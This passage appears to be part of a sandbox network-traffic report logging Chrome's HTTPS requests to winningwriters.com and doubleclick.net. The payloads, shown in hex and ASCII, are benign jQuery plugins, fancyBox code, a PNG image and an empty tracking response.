                                                                                                                                                                                            2024-11-18 20:00:10 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "5d2-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1490
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1490INData Raw: 24 28 22 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 22 29 2e 66 6f 63 75 73 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 24 28 74 68 69 73 29 3b 69 2e 76 61 6c 28 29 3d 3d 69 2e 61 74 74 72 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 26 26 28 69 2e 76 61 6c 28 22 22 29 2c 69 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 29 7d 29 2e 62 6c 75 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 24 28 74 68 69 73 29 3b 28 22 22 3d 3d 69 2e 76 61 6c 28 29 7c 7c 69 2e 76 61 6c 28 29 3d 3d 69 2e 61 74 74 72 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 29 26 26 28 69 2e 61 64 64 43 6c 61 73 73 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 2c 69 2e 76 61 6c 28 69 2e 61 74 74 72 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22
                                                                                                                                                                                            Data Ascii: $("[placeholder]").focus(function(){var i=$(this);i.val()==i.attr("placeholder")&&(i.val(""),i.removeClass("placeholder"))}).blur(function(){var i=$(this);(""==i.val()||i.val()==i.attr("placeholder"))&&(i.addClass("placeholder"),i.val(i.attr("placeholder"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            87192.168.2.1649816142.250.185.1304436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1052OUTGET /td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=1314571359 HTTP/1.1
                                                                                                                                                                                            Host: td.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                            2024-11-18 20:00:10 UTC954INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Fri, 01-Aug-2008 22:45:55 GMT; SameSite=none; Secure
                                                                                                                                                                                            Set-Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi; expires=Wed, 18-Nov-2026 20:00:10 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:10 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: d<html></html>
                                                                                                                                                                                            2024-11-18 20:00:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            88192.168.2.164982066.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC861OUTGET /assets/js/pageslide.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _ga=GA1.2.723902191.1731960008; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610
                                                                                                                                                                                            2024-11-18 20:00:10 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "81f-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 2079
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:10 UTC2079INData Raw: 2f 2a 0a 20 2a 20 6a 51 75 65 72 79 20 70 61 67 65 53 6c 69 64 65 0a 20 2a 20 56 65 72 73 69 6f 6e 20 32 2e 30 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 72 6f 62 62 69 6e 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 70 61 67 65 73 6c 69 64 65 2f 0a 20 2a 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 73 63 72 69 70 74 20 70 6c 75 67 69 6e 20 77 68 69 63 68 20 73 6c 69 64 65 73 20 61 20 77 65 62 70 61 67 65 20 6f 76 65 72 20 74 6f 20 72 65 76 65 61 6c 20 61 6e 20 61 64 64 69 74 69 6f 6e 61 6c 20 69 6e 74 65 72 61 63 74 69 6f 6e 20 70 61 6e 65 2e 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 31 20 53 63 6f 74 74 20 52 6f 62 62 69 6e 20 28 73 72 6f 62 62 69 6e 2e 63 6f 6d 29 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74
                                                                                                                                                                                            Data Ascii: /* * jQuery pageSlide * Version 2.0 * http://srobbin.com/jquery-pageslide/ * * jQuery Javascript plugin which slides a webpage over to reveal an additional interaction pane. * * Copyright (c) 2011 Scott Robbin (srobbin.com) * Dual licensed under t


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            89192.168.2.164982166.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC933OUTGET /assets/fancybox/jquery.fancybox.pack.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:10 UTC367INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "5a60-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 23136
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:10 UTC7825INData Raw: 2f 2a 21 20 66 61 6e 63 79 42 6f 78 20 76 32 2e 31 2e 35 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 20 7c 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 2f 66 61 6e 63 79 62 6f 78 2f 23 6c 69 63 65 6e 73 65 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 72 2c 47 2c 66 2c 76 29 7b 76 61 72 20 4a 3d 66 28 22 68 74 6d 6c 22 29 2c 6e 3d 66 28 72 29 2c 70 3d 66 28 47 29 2c 62 3d 66 2e 66 61 6e 63 79 62 6f 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 6f 70 65 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 49 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 6d 73 69 65 2f 69 29 2c 42 3d 6e 75 6c 6c 2c 73 3d 47 2e 63 72 65 61 74 65 54 6f 75 63 68 21 3d 3d 76 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74
                                                                                                                                                                                            Data Ascii: /*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */(function(r,G,f,v){var J=f("html"),n=f(r),p=f(G),b=f.fancybox=function(){b.open.apply(this,arguments)},I=navigator.userAgent.match(/msie/i),B=null,s=G.createTouch!==v,t=function(a){ret
                                                                                                                                                                                            2024-11-18 20:00:10 UTC8000INData Raw: 76 65 72 66 6c 6f 77 29 26 26 0a 28 68 5b 30 5d 2e 63 6c 69 65 6e 74 57 69 64 74 68 26 26 68 5b 30 5d 2e 73 63 72 6f 6c 6c 57 69 64 74 68 3e 68 5b 30 5d 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 68 5b 30 5d 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 26 26 68 5b 30 5d 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 3e 68 5b 30 5d 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 2c 68 3d 66 28 68 29 2e 70 61 72 65 6e 74 28 29 3b 69 66 28 30 21 3d 3d 63 26 26 21 6a 26 26 31 3c 62 2e 67 72 6f 75 70 2e 6c 65 6e 67 74 68 26 26 21 61 2e 63 61 6e 53 68 72 69 6e 6b 29 7b 69 66 28 30 3c 67 7c 7c 30 3c 6b 29 62 2e 70 72 65 76 28 30 3c 67 3f 22 64 6f 77 6e 22 3a 22 6c 65 66 74 22 29 3b 65 6c 73 65 20 69 66 28 30 3e 67 7c 7c 30 3e 6b 29 62 2e 6e 65 78 74 28 30 3e 67 3f 22 75 70 22 3a 22
                                                                                                                                                                                            Data Ascii: verflow)&&(h[0].clientWidth&&h[0].scrollWidth>h[0].clientWidth||h[0].clientHeight&&h[0].scrollHeight>h[0].clientHeight),h=f(h).parent();if(0!==c&&!j&&1<b.group.length&&!a.canShrink){if(0<g||0<k)b.prev(0<g?"down":"left");else if(0>g||0>k)b.next(0>g?"up":"
                                                                                                                                                                                            2024-11-18 20:00:10 UTC7311INData Raw: 6f 76 65 72 66 6c 6f 77 22 2c 22 76 69 73 69 62 6c 65 22 29 2e 61 64 64 43 6c 61 73 73 28 22 66 61 6e 63 79 62 6f 78 2d 6f 70 65 6e 65 64 22 29 2c 62 2e 75 70 64 61 74 65 28 29 2c 28 61 2e 63 6c 6f 73 65 43 6c 69 63 6b 7c 7c 61 2e 6e 65 78 74 43 6c 69 63 6b 26 26 31 3c 62 2e 67 72 6f 75 70 2e 6c 65 6e 67 74 68 29 26 26 62 2e 69 6e 6e 65 72 2e 63 73 73 28 22 63 75 72 73 6f 72 22 2c 22 70 6f 69 6e 74 65 72 22 29 2e 62 69 6e 64 28 22 63 6c 69 63 6b 2e 66 62 22 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 21 66 28 64 2e 74 61 72 67 65 74 29 2e 69 73 28 22 61 22 29 26 26 21 66 28 64 2e 74 61 72 67 65 74 29 2e 70 61 72 65 6e 74 28 29 2e 69 73 28 22 61 22 29 26 26 28 64 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 0a 62 5b 61 2e 63 6c 6f 73 65 43 6c 69 63 6b
                                                                                                                                                                                            Data Ascii: overflow","visible").addClass("fancybox-opened"),b.update(),(a.closeClick||a.nextClick&&1<b.group.length)&&b.inner.css("cursor","pointer").bind("click.fb",function(d){!f(d.target).is("a")&&!f(d.target).parent().is("a")&&(d.preventDefault(),b[a.closeClick


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            90192.168.2.164982266.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1162OUTGET /assets/images/lion-mobile.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:10 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:42 GMT
                                                                                                                                                                                            ETag: "b213-578fd677f2c80"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 45587
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:10 UTC7822INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 af 00 00 01 06 08 06 00 00 00 13 f6 c5 e7 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 70 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 31 20 36 34 2e 31 34 30 39 34 39 2c 20 32 30 31 30 2f 31 32 2f 30 37 2d 31 30 3a 35 37 3a 30 31 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<piTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01
                                                                                                                                                                                            2024-11-18 20:00:10 UTC8000INData Raw: 4c 0d e7 fc b2 b0 d0 39 6a 41 cd 69 88 32 c0 3c 05 86 0e 1d fa 62 bb 76 ed ba 03 8e ef 9d 62 73 e9 a5 97 4e 0e bf 73 43 96 65 cb 96 b5 78 f3 cd 37 ef 74 56 42 b1 62 c5 3e e5 1a 1b 29 ef 28 b3 bc 68 e8 ed 38 98 8b e2 c9 02 43 52 a9 e9 6c 19 00 e4 d7 31 47 ae 18 cc b6 4e 96 bd e3 8e 3b 9e 77 be 1a 66 ba 9c 29 91 26 1a 69 fa 05 bb 89 47 32 b2 11 04 58 f9 87 6e dd ba 5d a2 f9 46 df ae a4 e3 74 ff ec b3 cf ae e6 59 4b 1b 9b 15 f4 b7 dd 76 5b 1c 16 e3 97 35 d8 94 0f 38 70 0f a0 b7 fb c6 0b df 9d f3 fc f3 cf bf 85 34 28 26 31 28 cb 74 82 7d 7e 7f 63 a7 e1 19 92 49 10 96 01 c6 3e 50 bd 7a f5 ae 94 b5 31 cf fb 63 93 26 4d ee a2 2c 5f 26 ca 86 93 74 28 b4 5f 65 87 43 0d f5 38 7a 66 b0 dc fd 7e af bd f6 da 5f d2 fe 0c 99 59 e9 b2 95 81 7e b3 a8 9c 39 01 f3 54 84 09
                                                                                                                                                                                            Data Ascii: L9jAi2<bvbsNsCex7tVBb>)(h8CRl1GN;wf)&iG2Xn]FtYKv[58p4(&1(t}~cI>Pz1c&M,_&t(_eC8zf~_Y~9T
                                                                                                                                                                                            2024-11-18 20:00:10 UTC8000INData Raw: 83 fd e4 9e 0f 38 28 d9 01 6e 5a 1c 84 1a 34 cc 40 87 8e ad c4 9b 6f be 39 72 4a 64 18 23 0b 3a 70 e6 d0 3a d2 66 83 aa 8f 65 60 2b de f8 2a ba ef 36 58 e2 77 a5 ed 19 62 c3 31 ec c1 6f cb 99 27 80 d9 3e 08 db e7 77 ee 18 12 21 83 5e 3e 4c fe 09 ce d4 73 7c 3f 92 46 fc 2b 1b e8 25 a1 fc 19 9c 99 00 bb 36 c0 ba 6c 47 bb 4e 83 cd 0e b9 ba 8e a0 56 4b f3 7f 26 9d 2a a7 ef 38 69 12 10 55 87 0d 3b d2 a1 8a 85 05 b4 75 66 9d 75 8d 76 7e b0 6d db b6 f7 85 1b d0 81 ef 75 66 0a 1a f8 73 87 88 5d a7 18 f0 7d 94 27 4f 9e b4 b6 b3 fa d5 ce 60 1d 1a 21 31 7b 4f e7 58 49 e2 f7 46 6f 74 d0 1c ce b6 3e 5d 40 f0 ce 3b ef ec 4f 67 78 30 2e 01 1e ff b4 1d 48 0a 53 be 01 30 26 55 ab 56 6d 02 a0 69 0d 10 f3 d3 00 07 30 ad e9 d4 72 32 af d1 05 a5 44 18 01 52 ff ca bc 3a 15 ea
                                                                                                                                                                                            Data Ascii: 8(nZ4@o9rJd#:p:fe`+*6Xwb1o'>w!^>Ls|?F+%6lGNVK&*8iU;ufuv~mufs]}'O`!1{OXIFot>]@;Ogx0.HS0&UVmi0r2DR:
                                                                                                                                                                                            2024-11-18 20:00:10 UTC8000INData Raw: 3c 5d 6e f4 c2 c1 14 ad 92 69 ae e0 f0 6b a4 ec 45 3c d7 de df 0c 95 99 c2 47 0f b8 85 bf 35 ab 54 a9 92 22 30 67 98 4a ad 34 b0 21 03 8b 68 e2 04 a6 61 1e b3 90 ec 7d 36 08 37 3b c8 77 fb 71 16 ee c2 ec 35 c4 d9 b9 42 b3 0a b0 2e 93 51 d0 64 fd 35 0d 1b 36 6c 68 49 a1 8b f0 5d 55 d8 6c 02 3d 2e 3d ac b4 94 86 fd 46 a9 61 a6 fe c9 16 b6 73 d5 1a ae a5 8e ca 6e 78 cb 48 01 1d 49 c7 44 39 b3 dd 25 ec a9 9c 6f 60 a2 f7 d1 8e 93 f1 b6 27 9c d0 31 92 38 d0 e0 08 9b 43 c5 fc ce 64 a3 02 b2 21 1d b3 3d ef df 31 6f c3 a9 3f 3c eb 03 34 e8 b9 54 68 0a 18 e7 51 47 8b 00 d2 55 dc e7 31 7e b3 91 fb 14 b2 03 cb a6 c6 5f d5 a6 76 1c d9 30 6c 7b 6a 5d c9 94 fe 0d 8b dc c9 a2 7e 67 7d 85 3d dc b4 70 c1 03 57 7e 84 a4 24 d9 50 66 37 31 e6 c1 07 1f bc 03 60 7f 0d 53 1e e0
                                                                                                                                                                                            Data Ascii: <]nikE<G5T"0gJ4!ha}67;wq5B.Qd56lhI]Ul=.=FasnxHID9%o`'18Cd!=1o?<4ThQGU1~_v0l{j]~g}=pW~$Pf71`S
                                                                                                                                                                                            2024-11-18 20:00:10 UTC8000INData Raw: 40 46 16 c0 ba de 40 0a 2b 7b 76 8b 63 71 bb e1 89 60 e8 47 8e 78 02 81 df 00 5c c0 6f dd 8a 54 00 b4 ac 32 b3 56 85 3d 01 1e 6b 15 68 20 67 09 02 ec 4e 33 c0 31 80 9a e3 ed 77 b6 15 4e 27 72 d2 6c ae a3 63 4e 08 fc 8d f4 7c 53 f4 4c 39 04 ca 2c 92 20 5f 49 43 e6 f0 24 09 c7 3a ef b1 3a c7 6a 75 88 ab 05 e0 d4 74 e6 30 cc 40 ba f9 f3 e7 93 48 fb 6b 8d 20 eb ff 88 f6 63 8a fb b5 d7 5e eb 28 e9 13 e5 70 b3 5e 38 a5 fb 4c ad fa 3f ce 1e be 34 97 a5 c0 22 40 fc 4a 1a 24 0d bd 9f cb 38 9a 35 7e fc f8 fa 1a a6 af 67 96 0a 16 f5 62 18 00 82 e1 c3 10 0d 40 9d 1c c6 9e 80 70 4b fe a9 d9 32 5e b8 9e f8 1d e7 c0 78 73 30 68 98 19 09 01 30 38 17 2f 8e 47 2e 38 c1 21 9b 3a bd 93 d8 0b dc f9 3d 32 c3 86 59 18 8b f7 54 47 f1 14 b2 e3 a4 39 2d 16 2c cc 7b 00 ce b4 34 1d
                                                                                                                                                                                            Data Ascii: @F@+{vcq`Gx\oT2V=kh gN31wN'rlcN|SL9, _IC$::jut0@Hk c^(p^8L?4"@J$85~gb@pK2^xs0h08/G.8!:=2YTG9-,{4
                                                                                                                                                                                            2024-11-18 20:00:10 UTC5765INData Raw: cc 3b c5 f6 6c b6 cc a2 11 a0 9a 18 79 9c 3a f6 0f 67 62 5f 7c b4 7b f7 ee bd 4d 9d b0 84 80 9a c1 81 46 60 5b 47 c9 01 b8 18 85 f8 b7 d1 f6 c8 07 bc 0e cc bc 61 bc a9 13 5f a5 3a 49 a7 ba f9 dd d6 3a a4 18 83 4d 80 2c 28 30 e6 af 59 b3 e6 8b 62 bd 0d 09 b8 b5 8e 0a a0 ef 8b 29 8a 90 05 9d 45 25 0c 77 62 c4 42 ea c0 7d 3a 76 ec b8 46 9a b5 d1 b9 5e 6f ce 9c 39 f7 ec d9 b3 e7 1a 1a 92 78 0c 34 1e 80 c5 40 73 16 1f 58 18 96 42 ef f2 f9 bd f7 de 1b 18 77 1c cb 16 74 e2 6f 25 45 dd 90 68 45 9d f9 61 24 8d 9e f9 2a 8d 04 fd 1d 27 8d 4d 93 32 b6 f2 c6 3f 9e 38 67 1a 11 1e 17 68 bf 82 59 39 d6 49 0b 19 55 90 47 7c e6 2d 50 3c a3 d3 13 38 a3 27 cf b9 7c f9 f2 ee 2b 57 ae 6c 18 01 ef 59 86 39 0d 89 77 68 98 ab 2f 80 6c 71 b8 22 86 3e 55 72 da f0 7d da 70 5e ff 6a
                                                                                                                                                                                            Data Ascii: ;ly:gb_|{MF`[Ga_:I:M,(0Yb)E%wbB}:vF^o9x4@sXBwto%EhEa$*'M2?8ghY9IUG|-P<8'|+WlY9wh/lq">Ur}p^j


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            91192.168.2.1649826162.159.140.2294436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
